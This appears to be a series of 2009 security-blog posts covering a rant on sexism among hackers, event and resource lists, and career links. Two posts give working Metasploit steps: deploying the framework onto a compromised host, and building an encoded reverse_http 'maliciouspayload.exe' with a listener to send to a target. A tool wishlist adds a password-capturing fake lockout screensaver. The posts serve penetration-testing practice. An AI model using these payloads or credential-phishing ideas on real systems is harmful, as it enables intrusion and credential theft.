“People are stupid. They will believe a lie because they want to believe it’s true, or because they are afraid it might be true.”

—-Wizard’s First Rule – By Terry Goodkind

This post was a long time coming. I feel pretty passionate about “my community”. I don’t say that in a lead-follower sense, but more of a Kum Ba Ya one. The feather that pushed this post over the edge into existence is @shazzzam’s post “Female stereotyping in security research” which was in response to the Saphead’s Binary 300 solution cartoon. But please keep in mind, this only set the cogs in motion for this post that I’ve been thinking about way before this cartoon came into existence.

Sexism, and for that matter, any “-ism” is flawed on both sides. Now, Shazzzam went no where near the extreme that most of the “-ists” do for their “-isms”, she actually had some great points  however, that doesn’t excuse the presumptions she made. Pusscat, Hypatia, and Shazzzam (+ the many other women in IT) have made enormous contributions, just as males have. Hackers are hackers. The only thing we measure by is the brain in your noggin, but I’ll go into that later. Where Shazzzam went wrong is that she assumed that this cartoon was depicting the female falsely, which may or may have not been the case. She then used it as a soap box to express her hate for people who make presumptions about her mental abilities because of her sex.

(Damn men, “they” are always assuming I’m an idiot)

“What’s the difference between a WM (woman-Marine) and a hooker? Hooker gets paid in the morning and the WM gets paid on the 1st and 15th.”

—-old Marine joke, origin unknown

While this is a crude joke, it illustrates a point. During my time in the Marine Corps I witnessed female Marines that were useless, ones that slept around, and those that outshined their peers, male and female alike. But guess what, those that did well were sadly the minority in my experiences. Now you might hinge your argument on that it’s my biased opinion that ‘saw’ what I wanted to see, and you very well could be right. I hardly consider myself perfect, but lets just say for the sake of argument that what I say is true. We all make assumptions, you are not perfect either, is it so wrong to bet on odds or experience when making assumptions? It’s human nature, but keeping an open mind is the key to this. How many Mark Dowds, HDs, Shazzzams and Pusscats are there in this world? How many times have you complained about an idiot boss or co-worker? How many times have you complained about script kiddies? or whatever you complain about on an assumption or amassed experience.

(Stupid woman, “they” never do anything right, can’t even drive straight)

This brings us to my favorite part, and why I love our community. Hackers are hackers:

<snip> (original – phrak)

We exist without skin color, without nationality, without religious (or sexual) bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals.

Yes, I am a criminal.  My crime is that of curiosity.  My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto.  You may stop this individual, but you can’t stop us all… after all, we’re all alike.

+++The Mentor+++

I’ve taken the liberty of adding “(or sexual)” to this famous manifesto. But I think it stays in the spirit of it’s writer’s intent. This is my religion. I think all “ists” have forgotten what they fight for and just fight to be right. My suggestion? Make a mental note of those who have forgotten how to truly be what they claim as a title. For they will out themselves time and time again, and be destined to fail.

(Damn kids.  They’re all alike.)

EDIT: Nikita has done an excellent job of expressing what I so obviously failed at doing: http://attrition.org/news/content/09-07-14.001.html

No related posts.

© mubix for Room362.com, 2009. | Permalink | 12 comments | Add to del.icio.us
Post tags: Hacking, manifesto, mentor, Rant, religion, security, sexism

I’ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome http://www.novainfosecportal.com/ which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.

Grecs (follow him on twitter) does an amazing job at keeping it up to date and filled with every event possible. (Subscribe to his google calendar of events, get the RSS feed.. all good stuff)

But there are other resources too:

DojoSec – http://www.dojosec.com/- run by the amazing Marcus J. Carey who recently joined the PaulDotCom Security Weekly crew. DojoSec is a Monthly min-conference with 1 track and some of the best speakers in the local area, definitely worth

The Shmoo Group hosts the recently revived Security Geeks mailing list:  http://lists.shmoo.com/mailman/listinfo/secgeeks

I run a luncheon that you can get on the list simply by emailing me (mubix hak5.org) or commenting here if you wish.

Another site to keep up on is http://infosecevents.net/ run by GGEE has a more broad scope of events, not just in the area.

Hope this helps more people find ways of getting connected with the community.

Related posts:

1. Podcasters Meetup at ShmooCon More information can be found at http://www.podcastersmeetup.com/ But here is...
2. Getting your fill of Security I recently posted a blog post to Exotic Liability’s website...
3. Podcaster’s Meetup @ DEFCON 16 Update 2 It’s almost that time. DefCon is right around the corner...

I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.

Thanks defintely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.

You can download the script here: http://www.room362.com/tools/deploymsf.rb

You can download the cygwin installs from the metasploit website:

13mb FULL framework: https://metasploit.com/framework-3.3-dev.exe
5mb MINI (just msfconsole): https://metasploit.com/mini-3.3-dev.exe

And here is what it looks like:

meterpreter > run deploymsf -f framework-3.3-dev.exe
[*] Running Meterpreter MSFp Deploytment Script…..
[*] Uploading MSFp for for deployment….
[*] MSFp uploaded as C:\DOCUME~1\mubix\LOCALS~1\Temp\12681.exe
[*] Installing MSFp………..
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized…
[*] Channel 18 created – Type: interact 18 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 18
Interacting with channel 18…

[*] Configuring multi-user permissions for first run…
[*] Configuring the initial user environment…
pwd
/home/mubix
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load — active_record
[-] ***

##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
##

=[ msf v3.3-dev
+ — –=[ 379 exploits – 231 payloads
+ — –=[ 20 encoders – 7 nops
=[ 156 aux

msf >GAME OVER

Related posts:

1. Metasploit heart’s Microsoft Hiding Meterpreter with IExpress from mubix on Vimeo. Using...
2. PassiveX fun with Metasploit I posted this walkthrough to the Metasploit mailing list, but...
3. Metasploit Across the Net Metasploit is awesome, but some don’t know that their are...

1. A portable version of of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.
2. A application that can sniff traffic from a specific process. Metasploit’s keylogger is sort of there as it only pulls keys from the process of which it is attached (DLL is to ‘fault’ for this). And Process Hacker is also pretty close, (Process Explorer does a TCPVIew like show of the connections currently happening).
3. An nmap script that sees port 445 open and tries pass the hash, and token passing to run a specified executable. I believe tebo was developing a psexec scanner for Metasploit, but it hasn’t been released as of yet.
4. A meterpreter script that sets the a all user GPO setting for wallpaper and forces the update. (For calling-card notifications during pen-tests)
5. A password list generator that would take URLs, and files (pulling metadata where applicable, strings in other cases). And churn out a dictionary, and also ask if you would like to start generating a Rainbow Table for that specific dictionary.
6. A meterpreter module like “Echo Mirage” by the BeEF guys, sort of like an iptables injection that modifies/accepts/denys packets to a specific process
7. This is Kevin Johnson’s idea but it should be posted: A standard XMLish format for all Web Application Scanners so that the tools interoperate. One spider session can be loaded into another tool and have it’s auditing system check it, instead of being confined too one tool.
8. A screen saver that imitates the screen saver lockout event and has the user login (and has it fail twice by default for “Password Validation ”)  and then allows them back in, capturing those password. (Usually a user will try a couple different passwords so you might be able to glean other credentials to use). It could also have an option to state. “Account Locked, You must be an Administrator to login” so that they call an admin in to unlock it

I’ll leave it at that for now. Anyone interested in coding it ?

Related posts:

1. Metasploit Framework as a Payload Well, sorta… I created a meterpreter script that takes the...
2. DEFCON 16: The Tools not the Toools Originally posted to the Zero Day blog on Ziff Davis:...
3. ShmooCon Tools It figures that someone who didn’t go actually made a...

Individuals —

Skywing – http://www.nynaeve.net/
Egypt – http://0xegypt.blogspot.com/
Yoni – http://blogs.msdn.com/michael_howard/
Raymond Chen – http://blogs.msdn.com/oldnewthing/
Sia0 – http://blogs.msdn.com/michkap/
Rob P – http://geekswithblogs.net/robp/Default.aspx
Quantam – http://qstuff.blogspot.com/
Phn1x – http://hamsterswheel.com/techblog/
Halavar Flake – http://addxorrol.blogspot.com/
Pedram – http://pedram.redhive.com/blog
Tyler Shields – http://www.donkeyonawaffle.org/
Wesley Shields – http://www.atarininja.org/
Peter Wieland – http://blogs.msdn.com/peterwie/
Michael Howard – http://blogs.msdn.com/michael_howard/
Doron Holan – http://blogs.msdn.com/doronh/
Nico Waisman – http://eticanicomana.blogspot.com/
Dmitry Vostokov – http://www.dumpanalysis.org/blog/
Nicolas Sylvain – http://nsylvain.blogspot.com/
Alex Ionescu – http://www.alex-ionescu.com/
Mattheiu Suiche – http://www.msuiche.net/
Larry Osterman – http://blogs.msdn.com/larryosterman/
Koby Kahane – http://kobyk.wordpress.com/
Jason Geffner – http://malwareanalysis.com/communityserver/blogs/geffner/default.aspx
Ero Carrera – http://blog.dkbza.org/
Dino Dai Zovi – http://blog.trailofbits.com/
Ilja – http://blogs.23.nu/ilja/
Nate Lawson – http://rdist.root.org/
Mark Russinovich – http://blogs.technet.com/markrussinovich/
Jose Nazario – http://www.wormblog.com/
Jonathan Morrison – http://blogs.msdn.com/itgoestoeleven/
John Robbins – http://www.wintellect.com/cs/blogs/jrobbins/default.aspx
Ilias Tsigkogiannis – http://blogs.msdn.com/iliast/
Daniel Reynaud – http://indefinitestudies.org/
Joanna Rutkowska – http://theinvisiblethings.blogspot.com/
Matthieu Kaczmarek – http://www.loria.fr/~kaczmare/index.en.htm
Silvio Cesare – http://silviocesare.wordpress.com/
Philippe Beaucamps – http://www.loria.fr/~beaucphi/
Debugging Toolbox – http://blogs.msdn.com/debuggingtoolbox/

Fravia’s saved works (RIP) – http://www.woodmann.com/fravia/index.htm

Groups —

Offensive Computing – http://www.offensivecomputing.net/
The Cover of Night – http://www.thecoverofnight.com/blog/
LHS – http://lhs.loria.fr/
NT Debugging – http://blogs.msdn.com/ntdebugging/
Hex Blog – http://www.hexblog.com/
Engineering for Fun – http://blog.engineeringforfun.com/

Company —

OpenRCE – http://www.openrce.org/articles/
DV Labs – http://dvlabs.tippingpoint.com/blog/
Matasano – http://www.matasano.com/log/
VeraCode – http://www.veracode.com/blog/
Trend Micro – http://blog.trendmicro.com/

Forums —

Reverse Engineering – http://community.reverse-engineering.net/index.php
OpenRCE – http://www.openrce.org/forums/
Assembly Forums – http://www.asmcommunity.net/board/

Sandboxing and Analysis —

Joe Box – http://www.joebox.org/
Virus Total – http://www.virustotal.com/
Wepawet – http://wepawet.cs.ucsb.edu/
F-Secure -http://www.f-secure.com/en_US/security/security-lab/
Anubis – http://anubis.iseclab.org/
Jotti – http://virusscan.jotti.org/en
Sunbelt CWSandbox – http://www.sunbeltsecurity.com/Submit.aspx?type=cwsandbox&cs=A41CD150B37359889A553671CBFD2360

Misc —

Code Breakers Journal – http://www.codebreakers-journal.com/
The Art of Assembly – http://webster.cs.ucr.edu/AoA/DOS/AoADosIndex.html
Intel Processor Instruction Set A-M/N-Z – http://www.intel.com/products/processor/manuals/
WASM.ru with translation – http://66.196.80.202/babelfish/translate_url_content?lp=ru_en&url=http://www.wasm.ru&.intl=us

Related posts:

1. Getting your fill of Security I recently posted a blog post to Exotic Liability’s website...
2. Runtime Packers – hold the cheese So we are taking a short break from my...
3. DEFCON 16: The Tools not the Toools Originally posted to the Zero Day blog on Ziff Davis:...

Here are my thoughts on what he wrote:

In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the lime light or to pimp some product/0day. And the second being a lot of the talks are things that most can’t go home / back to work and test out or implement.

I agree with him on both points.

On the first point I think that one detail was left out of this evaluation. Size. Back when DEFCON was <500 people, almost everyone knew each other. 90% of those attending had the passion, had the fire for that what makes our line of work such an art. Now that our community has become “popular”, that percentage is around 20-30%. These numbers aren’t based on any stats, just something that I have been observing as well.

On the second point, my first security conference was ShmooCon ‘06. I was glued to might seat in each talk I attended, and in just 3 short years I have seen EXACTLY what he’s talking about. I used to have to decide between awesome talks in the same hour. Now I actually find times where I’m not interested in anything being presented for that hour. But, rooms still get packed so I guess that’s just my own pickiness.

Penetration Testing and Incident is the second portion of his post and I really think he’s hit the nail on the head, Pen Testing and Incident Response should work closely together. I want to throw Vulnerability Assessment and Forensics into the mix as well, feeding each other, sharing data, and assisting. The segmentation of duties / teams is killing collaboration.

Lets get back to the basics, and really show what this community is capable of.

Related posts:

1. Sexism and the religion of hackers Let me preempt this post with the following facts: I...
2. Security Guards without guns I have had this rant on Twitter (if they had threading...

A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).

(props to skape for writting PassiveX and @_natron_ for kicking in the latest tweaks to make it work with IE7/IE8)

Here are the options for msfpayload:

Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>

And msfencode’s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):

./msfencode -h

Usage: ./msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: ‘\x00\xff’
-c <opt>  The number of times to encode the data
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-s <opt>  The maximum size of the encoded data
-t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)

Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:

./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe

[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)

Now that we have our "malicious payload" in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):

./msfconsole

_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux

msf > use multi/handler
msf exploit(handler) > exploit -h

(I'm showing you 'exploit's options because a lot of people don't know they exist. With two lines you can start your listener (use, then exploit):

Usage: exploit [options]
Launches an exploitation attempt.

OPTIONS:
-e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
-h        Help banner.
-j        Run in the context of a job.
-n <opt>  The NOP generator to use.  If none is specified, NOP is used.
-o <opt>  A comma separated list of options in VAR=VAL format.
-p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
-t <opt>  The target index to use.  If none is specified, TARGET is used.
-z        Do not interact with the session after successful exploitation.

msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False

[*] Exploit running as background job.
[*] PassiveX listener started.
[*] Starting the payload handler…

msf exploit(handler) >

Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you’re set.

Related posts:

1. Metasploit heart’s Microsoft Hiding Meterpreter with IExpress from mubix on Vimeo. Using...
2. The Root of All Evil-(grade) So there I was… Today I was sitting at home...
3. Metasploit Framework as a Payload Well, sorta… I created a meterpreter script that takes the...

Podcasting:
GetMon – http://www.getmon.com/ – This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.
HackerMedia – http://www.hackermedia.org/ – They put together like podcasts into different categories, and they overlap. So if you want the "Linux" feed, you’ll get podcast A, B, and C. But maybe podcast C does Linux security, so if you subscribe to the "Security" feed, you might get C, E, and G. You can also get the everything feed

Bloggers (RSS Feeds):
Security Bloggers Network – http://www.securitybloggers.net/ – A consolidated feed of a HUGE list of security blogs

Twitter:
Security Twits – http://www.security-twits.com/ – A long list of security related twitter accounts. From people to events, to companies.

Places to learn:
The Academy Pro – http://www.theacademypro.com/
Learn Security Online – http://www.learnsecurityonline.com/
Free IT Security Training – http://www.freeitsecuritytraining.com/
Virtual Training Environment by Carnegie Mellon – https://www.vte.cert.org/vteweb/

Challenge Sites and Sites that are OK to attack:
(Make sure you know which is which before you haul off and start attacking though)
(Most of these stolen from Chris Nickerson’s reply to Show 17 Links blog post)

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
http://testasp.acunetix.com/Default.asp
http://test.acunetix.com/
http://hackme.ntobjectives.com/
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
http://lampsecurity.org/capture-the-flag-5
http://zero.webappsecurity.com/
http://www.hackertest.net/
http://www.hackthissite.org/
http://www.mavensecurity.com/WebMaven.php
http://ha.ckers.org/challenge/
http://ha.ckers.org/challenge2/
http://demo.testfire.net/
http://scanme.nmap.org/
http://www.hellboundhackers.org/
http://www.overthewire.org/wargames/
http://roothack.org/
http://heorot.net/
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately…
http://wocares.com/xsstester.php
https://how2hack.net
http://hax.tor.hu/
http://www.bright-shadows.net/
http://www.dareyourmind.net/
http://hackergames.net/
http://www.hackquest.com/
http://www.darkmindz.com/
http://www.caesum.com/game/
http://www.net-force.nl/
http://www.osix.net/
http://www.mibs-challenges.de/
http://projecteuler.net/
http://uva.onlinejudge.org/
http://ace.delos.com/usacogate

So now you have absolutely ZERO reason to have one moment of time on your hands
Know of another good resource? Post a comment.

UPDATE: ethicalhack3r from http://www.ethicalhack3r.co.uk pointed me to his project called “Damn Vulnerable Web App”. You can find it on Sourceforge here: http://sourceforge.net/projects/dvwa/

Related posts:

1. Local Security – DC-NoVA-MD Looking for local events? I’ve gotten a lot of people...
2. SBN move to Lijit Alan posted this about the SBN: Well there is not...
3. Getting your fill of Reverse Engineering and Malware Analysis Matt, from the Exotic Liability forums, posed a suggestion for...

I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies to getting a job. That, and Matt Johansen beat me to it with his blog post titled: “A lot of Information Security Career Advice“, which I highly recommend you check out and add to your RSS reader.  So instead of rewriting things that other people have already covered I’ll just post the links to them:

We start our journey as any real hacker would, with the “Hacker Handle Generator“.  And since I am more of an Audio/Visual Leaner  let’s start off with “Exotic Liability Episode 10: Advice” Where Ryan Jones, DJ Jackalope, and Chris Nickerson, of “Tiger Team” fame, fortune and power,  call back Michigan Justin and talk at length about how to start out in the community. We also have Don Donzal from EthicalHacker.net who talks about “DIY Career in Ethical Hacking” (MP3 / SLIDES), and about 16 tips from “Ugly Resumes get Jobs!” on Slideshare. But this A/V setup wouldn’t be complete if I didn’t tell you guys where you can get all kinds of videos actually teaching you security so that you can have a leg up on everyone else. Head on over to TheAcademyPro.com where you can watch 1-5 minute videos on everything from configuring Snort and exploiting systems with Metasploit, to configuring Sourcefire 3D and destroying the world with Core Impact. Another site to bookmark is SecurityTube.net. The guys there work their fingers to the bone to locate security videos across the net and put them all in one central pace for you to access.

Now on for those people who like to do all that “reading” stuff.  First head on over to the Security Catalyst for Part 1 and Part 2 of “Career Advice for Security Geeks” and Paul Asadoorian’s post titled “Getting Started In Information Security How-To” and Kees Leune’s post titled “Tips for Getting Started in Information Security“, and if you are really feeling froggy, read all 4+ years (only 6 or so pages don’t worry too much) of the discussion on the Defcon forums: “Getting started in the security field”

Finally, sticking with the theme that I try to keep going on this blog I want to give you something new to digest:

James Arlen (aka myrcurial) does a talk at Notacon about going from BlackHat to BlackSuit

LifeHacker’s “Top 10 Tools for landing a better job”

Aaron Crowe writes about “How to avoid being scammed in a job hunt”

Lee Kushner writes about “Wanting a Job Too Much”

Two Mashable articles: “How to find a Job on Twitter” and “How to exchange Biz cards on Twitter”

But I wanted to close with some advice that a lot of people have a hard time with. And that is how to talk dollars, and how to do it well.  And Jack Chapman is certainly the guy to learn from. Check out a write-up on him on GetRichSlowly.org titled “Negotiating Your Salary: How to Make $1,000 a Minute” (which is the title of Chapman’s book). And Chapman’s site where he has tons of YouTube videos of tips that he describes in the book.

Sorry this is a bunch of links, and if you guys would like me to explain each slide in my Couch to Career deck I’ll make another post about it.

Related posts:

1. Couch to Career in 80 hours or less DojoSec Monthly Briefings – April 2009 – Rob Fuller...
2. Offensive Security Certified Professional I recently obtained the status Offensive Security Certified Professional. It...

You can find us on the ToorCamp site: http://www.toorcamp.org/content/W13

Here is the description of our talk, save the bio(s):

The Art of Pivot and Persistence:

Shell is only the beginning.

This workshop is based on the assumption that you have some level of access on a target system. From that it is demonstrated how to go from that level of access to taking over the whole company and how to keep that access, surviving reboots, AV scans, and even reimaging. The following levels of access is covered:

1. Domain Administrator access on a domain controller
2. Local Administrator access on a client machine
3. Root on a Database server
4. Root on a Web server
5. User on a client machine
6. User on a Database server
7. User on a Web server

Related posts:

1. Random Thoughts – Web App Hacking SQLi through meta refreshes using cookies or useragents. Making...